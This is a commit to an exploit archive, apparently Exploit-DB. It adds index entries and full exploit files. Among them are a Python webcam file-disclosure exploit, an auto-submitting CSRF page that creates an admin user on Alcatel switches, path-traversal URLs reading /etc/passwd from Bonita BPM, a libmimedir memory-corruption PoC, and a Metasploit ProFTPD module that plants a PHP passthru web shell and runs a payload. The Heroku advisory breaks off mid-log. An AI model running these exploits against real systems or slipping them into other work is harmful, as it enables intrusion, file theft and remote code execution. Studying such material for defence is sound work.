DB: 2015-06-11

16 new exploits
2015-06-11 05:02:28 +00:00 · 2015-06-11 05:02:28 +00:00 · 5aabf25b26
commit 5aabf25b26
parent 5ff70806ea
17 changed files with 1437 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -33486,6 +33486,9 @@ id,file,description,date,author,platform,type,port
 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0
 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
 37253,platforms/php/webapps/37253.txt,"Paypal Currencucy Converter Basic For Woocommerce File Read",2015-06-10,Kuroi'SH,php,webapps,0
 37254,platforms/php/webapps/37254.txt,"Wordpress History Collection <=1.1.1 Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0_ 5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0
 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0
 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0
@ -33593,6 +33596,7 @@ id,file,description,date,author,platform,type,port
 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal and Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0
 37214,platforms/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps,0
 37252,platforms/php/webapps/37252.txt,"Wordpress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80
 37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha 'captchademo.php' Cross Site Scripting Vulnerability",2012-05-16,"Daniel Godoy",php,webapps,0
 37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0
 37218,platforms/jsp/webapps/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 XML Parsing Denial of Service Vulnerability",2012-05-17,anonymous,jsp,webapps,0
@ -33608,11 +33612,23 @@ id,file,description,date,author,platform,type,port
 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
-37248,platforms/php/webapps/37248.txt,"SV: Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
+37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 -  Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
 37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
 37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,80
 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
--- a/platforms/hardware/webapps/37258.py
+++ b/platforms/hardware/webapps/37258.py
@ -0,0 +1,79 @@
 #!/usr/bin/python
 import os
 import sys
 import socket
 import binascii
 '''
 Title       : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
 CVE-ID      : none
 Product     : GeoVision
 System		: GeoHttpServer
 Affected    : 8.3.3.0 (may be more)
 Impact      : Critical
 Remote      : Yes
 Website link: http://www.geovision.com.tw/
 Reported    : 10/06/2015
 Author      : Viktor Minin, minin.viktor@gmail.com
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 No authentication (login) is required to exploit this vulnerability. 
 The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
 An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
 '''
 #os.system("cls")
 os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
 os.system('color 2');
 socket.setdefaulttimeout = 0.50
 os.environ['no_proxy'] = '127.0.0.1,localhost'
 CRLF = "\r\n"
 def main(): 
 	print "#######################################################################"
 	print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
 	print "# Usage: <ip> <port> <file>" 
 	print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini" 
 	print "#######################################################################"
 	exit()
 try:
 	url 	= sys.argv[1]
 	port 	= int(sys.argv[2])
 	#files 	= open(sys.argv[3],'r').read().split() 
 	file 	= sys.argv[3]
 except:
 	main()
 def recvall(sock):
 	data = ""
 	part = None
 	while part != "":
 		part = sock.recv(4096)
 		data += part
 	return data
 def request(url, port, pfile):
 	PATH = str(pfile)	
 	HOST = url
 	PORT = port
 	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 	sock.connect((HOST, PORT))
 	sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
 	data = recvall(sock)
 	temp = data.split("\r\n\r\n")
 	sock.shutdown(1)	
 	sock.close()
 	return temp[1]
 ret = request(url, port, file)
 hex	= "".join("{:02x}".format(ord(c)) for c in ret)
 bin = binascii.unhexlify(hex)
 print ret
 file = open(file.replace('\\', '_'),"wb")
 file.write(bin)
 file.close()
 #~EOF
--- a/platforms/hardware/webapps/37261.txt
+++ b/platforms/hardware/webapps/37261.txt
@ -0,0 +1,206 @@
 Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery
 During a penetration test, RedTeam Pentesting discovered a vulnerability
 in the management web interface of an Alcatel-Lucent OmniSwitch 6450.
 The management web interface has no protection against cross-site
 request forgery attacks. This allows specially crafted web pages to
 change the switch configuration and create users, if an administrator
 accesses the website while being authenticated in the management web
 interface.
 Details
 =======
 Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400,
  6855, 6900, 10K, 6860
 Affected Versions: All Releases:
  AOS 6.4.5.R02
  AOS 6.4.6.R01
  AOS 6.6.4.R01
  AOS 6.6.5.R02
  AOS 7.3.2.R01
  AOS 7.3.3.R01
  AOS 7.3.4.R01
  AOS 8.1.1.R01
 Fixed Versions: -
 Vulnerability Type: Cross-site request forgery
 Security Risk: medium
 Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
 Vendor Status: notified
 Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
 Advisory Status: published
 CVE: CVE-2015-2805
 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805
 Introduction
 ============
 "The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable
 LAN Switches are the latest value stackable switches in the OmniSwitch
 family of products. The OmniSwitch 6450 was specifically built for
 versatility offering optional upgrade paths for 10 Gigabit stacking, 10
 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and
 Metro Ethernet services."
 (from the vendor's homepage)
 More Details
 ============
 The management web interface of the OmniSwitch 6450 can be accessed
 using a web browser via HTTP. The web interface allows creating new user
 accounts, in this case an HTTP request like the following is sent to the
 switch:
  POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
  Host: 192.0.2.1
  [...]
  Cookie: session=sess_15739
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 214
  EmWeb_ns:mip:2.T1:I1=attacker
  &EmWeb_ns:mip:244.T1:O1=secret
  &EmWeb_ns:mip:246.T1:O2=-1
  &EmWeb_ns:mip:248.T1:O3=
  &EmWeb_ns:mip:249.T1:O4=1
  &EmWeb_ns:mip:250.T1:O5=4
 This request creates a user "attacker" with the password "secret". All
 other parametres are static. All POST parametres can be predicted by
 attackers
 This means that requests of this form can be prepared by attackers and sent
 from any web page the user visits in the same browser. If the user is
 authenticated to the switch, a valid session cookie is included in the request
 automatically, and the action is performed.
 In order to activate the new user for the web interface it is necessary
 to enable the respective access privileges in the user's profile. This can also
 be done via the web interface. Then the HTTP POST request looks like the
 following:
  POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
  Host: 192.0.2.1
  [...]
  Cookie: session=sess_15739
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 167
  EmWeb_ns:mip:2.T1:I1=attacker
  &EmWeb_ns:mip:4.T1:O1=
  &EmWeb_ns:mip:5.T1:O2=
  &EmWeb_ns:mip:6.T1:O3=4294967295
  &EmWeb_ns:mip:7.T1:O4=4294967295
 This request sets all access privileges for the user "attacker" and
 is again completely predictable.
 Proof of Concept
 ================
 Visiting the following HTML page will create a new user via the switch's
 management web interface, if the user is authenticated at the switch:
 ------------------------------------------------------------------------
 <html>
 <head>
 <title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
 </head>
 <body>
  <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html"
  method="POST" id="CSRF" style="visibility:hidden">
    <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />
  </form>
 <script>
 document.getElementById("CSRF").submit();
 </script>
 </body>
 </html>
 ------------------------------------------------------------------------
 Workaround
 ==========
 Disable the web interface by executing the following commands:
 AOS6:
  no ip service http
  no ip service secure-http
 AOS 7/8:
  ip service http admin-state disable
 If this is not possible, use a dedicated browser or browser profile for
 managing the switch via the web interface.
 Fix
 ===
 Upgrade the firmware to a fixed version, according to the vendor the
 fixed versions will be available at the end of July 2015.
 Security Risk
 =============
 If attackers trick a logged-in administrator to visit an attacker-controlled 
 web page, the attacker can perform actions and reconfigure the switch. In this
 situation an attacker can create an additional user account on the switch for
 future access. While a successful attack results in full access to the switch,
 the attack is hard to exploit because attackers need to know the IP address of
 the switch and get an administrative user to access an attacker-controlled web
 page. The vulnerability is therefore rated as a medium risk.
 Timeline
 ========
 2015-03-16 Vulnerability identified
 2015-03-25 Customer approves disclosure to vendor
 2015-03-26 CVE number requested
 2015-03-31 CVE number assigned
 2015-04-01 Vendor notified
 2015-04-02 Vendor acknowledged receipt of advisories
 2015-04-08 Requested status update from vendor, vendor is investigating
 2015-04-29 Requested status update from vendor, vendor is still investigating
 2015-05-22 Requested status update from vendor
 2015-05-27 Vendor is working on the issue
 2015-06-05 Vendor notified customers
 2015-06-08 Vendor provided details about affected versions
 2015-06-10 Advisory released
 RedTeam Pentesting GmbH
 =======================
 RedTeam Pentesting offers individual penetration tests performed by a
 team of specialised IT-security experts. Hereby, security weaknesses in
 company networks or products are uncovered and can be fixed immediately.
 As there are only few experts in this field, RedTeam Pentesting wants to
 share its knowledge and enhance the public knowledge with research in
 security-related areas. The results are made available as public
 security advisories.
 More information about RedTeam Pentesting can be found at
 https://www.redteam-pentesting.de.
 -- 
 RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
 Dennewartstr. 25-27                       Fax : +49 241 510081-99
 52068 Aachen                    https://www.redteam-pentesting.de
 Germany                         Registergericht: Aachen HRB 14004
 Geschäftsführer:                       Patrick Hof, Jens Liebchen
--- a/platforms/jsp/webapps/37260.txt
+++ b/platforms/jsp/webapps/37260.txt
@ -0,0 +1,66 @@
 Advisory ID: HTB23259
 Product: Bonita BPM
 Vendor: Bonitasoft
 Vulnerable Version(s):  6.5.1  and probably prior 
 Tested Version:  6.5.1 (Windows and Mac OS packages)
 Advisory Publication:  May 7, 2015  [without technical details]
 Vendor Notification: May 7, 2015 
 Vendor Patch: June 9, 2015 
 Public Disclosure: June 10, 2015 
 Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
 CVE References: CVE-2015-3897, CVE-2015-3898
 Risk Level: High 
 CVSSv2 Base Scores: 7.8  (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
 Solution Status: Fixed by Vendor
 Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 -----------------------------------------------------------------------------------------------
 Advisory Details:
 High-Tech Bridge Security Research Lab two vulnerabilities in Bonita BPM Portal (Bonita's web interface running by default on port 8080), which can be exploited by remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted. 
 1) Path Traversal in Bonita BPM Portal: CVE-2015-3897
 User-supplied input passed via the "theme" and "location" HTTP GET parametres to "bonita/portal/themeResource" URL is not properly verified before being used as part of file name. The attacker may download any system file accessible to the web server user.  
 Simple PoC code below will return content of "C:/Windows/system.ini" file:
 http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini
 Second PoC will disclose the content of "/etc/passwd" file:
 http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
 2) Open Redirect in Bonita BPM Portal: CVE-2015-3898
 Input passed via the "redirectUrl" HTTP GET parametre to "/bonita/login.jsp" script and "/bonita/loginservice" URLs is not properly verified before being used as redirect URL.
 After login user may be redirected to arbitrary website:
 http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/
 -----------------------------------------------------------------------------------------------
 Solution:
 Update to Bonita BPM 6.5.3
 More Information:
 http://community.bonitasoft.com/blog/bonita-bpm-653-available
 -----------------------------------------------------------------------------------------------
 References:
 [1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM.
 [2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps. 
 [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
 [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
 [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 -----------------------------------------------------------------------------------------------
 Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
--- a/platforms/linux/dos/37249.py
+++ b/platforms/linux/dos/37249.py
@ -0,0 +1,51 @@
 #!/usr/bin/python
 # libmimedir-free.py
 #
 # Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
 #
 # Jeremy Brown [jbrown3264/gmail]
 # June 2015
 #
 # -Synopsis-
 #
 # Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls
 # which occur during it's lexer's memory clean-up procedure. This could lead to exploitable
 # conditions such as crafting a specific memory chunk to allow for arbitrary code execution.
 #
 # -Tested-
 #
 # libmimedir-0.5.1.tar.gz
 # libmimedir-static 0.4-13.fc21
 #
 # -Notes-
 #
 # Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
 # a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
 # fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
 #
 from struct import pack
 def main():
    mime = "begin:vcard<x\nx;type=x;type=x,"
    mime += pack("<Q", 0x4141414141414141) # mdm->p
    mime += pack("<Q", 0x4242424242424242) # mdm->next
    mime += ":x>x.l:x"
    mime += pack("<H", 0x0000) # 2 x YY_END_OF_BUFFER_CHAR
    print("Writing free.vcf to local directory...")
    try:
        with open("free.vcf", 'wb') as outfile:
            outfile.write(mime)
    except Exception as error:
        print("Error: %s\n" % error);
        return
    print("Done\n")
    return
 if __name__ == "__main__":
    main()
--- a/platforms/linux/remote/37262.rb
+++ b/platforms/linux/remote/37262.rb
@ -0,0 +1,148 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the filesystem to a chosen destination. The copy commands are executed with
          the rights of the ProFTPD service, which by default runs under the privileges of the
          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
          directory, PHP remote code execution is made possible.
      },
      'Author'         =>
        [
          'Vadim Melihow', # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars' => '',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic gawk bash python perl'
            }
        },
      'Targets'        =>
        [
          [ 'ProFTPD 1.3.5', { } ]
        ],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget' => 0))
    register_options(
      [
        OptPort.new('RPORT', [true, 'HTTP port', 80]),
        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
      ], self.class)
  end
  def check
    ftp_port = datastore['RPORT_FTP']
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end
    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end
    sock.puts("SITE CPFR /etc/passwd\r\n")
    res = sock.get_once(-1, 10)
    if res && res.include?('350')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
  def exploit
    ftp_port = datastore['RPORT_FTP']
    get_arg = rand_text_alphanumeric(5+rand(3))
    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end
    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end
    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
    end
    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
    end
    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
    end
    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
    end
    sock.close
    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, payload_name),
      'method' => 'GET',
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )
    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
    end
  end
 end
--- a/platforms/multiple/webapps/37256.txt
+++ b/platforms/multiple/webapps/37256.txt
@ -0,0 +1,434 @@
 Document Title:
 ===============
 Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability
 References (Source):
 ====================
 http://www.vulnerability-lab.com/get_content.php?id=1323
 Video: http://www.vulnerability-lab.com/get_content.php?id=1336
 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-bounty-2015-api-re-auth-session-token-bypass-vulnerability
 Release Date:
 =============
 2015-06-09
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 1323
 Common Vulnerability Scoring System:
 ====================================
 6.1
 Product & Service Introduction:
 ===============================
 Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. 
 Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers 
 without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and 
 designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. 
 Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.
 Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service 
 lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
 Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. 
 (Copy of the Vendor Homepage: https://www.heroku.com/home )
 Abstract Advisory Information:
 ==============================
 The Vulnerability Laboratory Research team discovered a application-side session validation vulnerability in the official Heroku API and web-application.
 Vulnerability Disclosure Timeline:
 ==================================
 2014-09-19:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
 2014-09-20:	Vendor Notification (Heroku Security Team - Bug Bounty Program)
 2015-03-11:	Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
 2015-06-08:	Vendor Fix/Patch Notification (Heroku Developer Team)
 2015-06-09:	Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 Heroku
 Product: Heroku Dashboard - Web Application (API) 2014 Q3
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 High
 Technical Details & Description:
 ================================
 An application-side re-auth session bypass vulnerability has been discovered in the official heroku API & web-application service.
 The vulnerability allows an attacker to request unauthorized information without the second forced re authentication module.
 The heroku web-service provides to all web services an expire session function that disallows to visit the page without re authentication.
 The dataclips page session of the editor and the postgres service allows to add for example new context. If the session expires in the main 
 heroku web-service the user will be forced to login again. 
 During the tests we releaved that the session of the dataclip service and editor is available even if the re-authentication service is still running.
 If the local attacker changes the path manually to request directly the stored context in the profile (like shown in video) he is able to bypass the 
 security mechanism to add or request the database name.
 The session validation mechnism needs to provoke a refresh of the progres datasheet page or the dataclips add through editor to prevent unauthorized 
 access after a session has been expired during the usage of the heroku service.
 The security risk of the re-auth session bypass vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1.
 Exploitation of the vulnerability requires a local low privilege heroku application user account without user interaction. Successful exploitation 
 of the vulnerability results in the evade and bypass of the re-authentication mechanism.
 Proof of Concept (PoC):
 =======================
 The local re auth bypass vulnerability can be exploited by local attackers with low privilege web-application user account or 
 by remote attackers without privlege web-application account and high user interaction. For security demonstration or to reproduce 
 the security vulnerability follow the provided information and steps below to continue.
 Manual steps to reproduce the re-auth bypass vulnerability ...
 1. Register a webpage account at the official heroku website
 2. Provoke the re-auth function that pops up after several profile interaction during the time after the session expired
 3. When the session is expired to do not press the re-auth function button that popup stable to all service
 4. Switch back to the postgres.heroku service and add dataclips or own databases even if the session is expired to all other modules and sites
 Note: Even if all session are expired the user is able to request the database and the dataclips in the service without authorization
 5. Successful reproduce of the session vulnerability!
 Video Demonstration
 The video demonstrates the vulnerability in the re-auth function of the heroku service which affects only the heroku service with the dataclips and databases.
 The session expired values also needs to be recognized in the database service and the site validation request to prevent access without re-auth to heroku itself.
 Exception Message:
 -Your session has expired
 --Your current session has expired or become inactive and has been terminated.
 ---Please log in again to continue using Dashboard.
 --- PoC Session Logs ---
 17:55:32.218[718ms][total 718ms] Status: 303[See Other]
 GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[id.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://www.heroku.com/home]
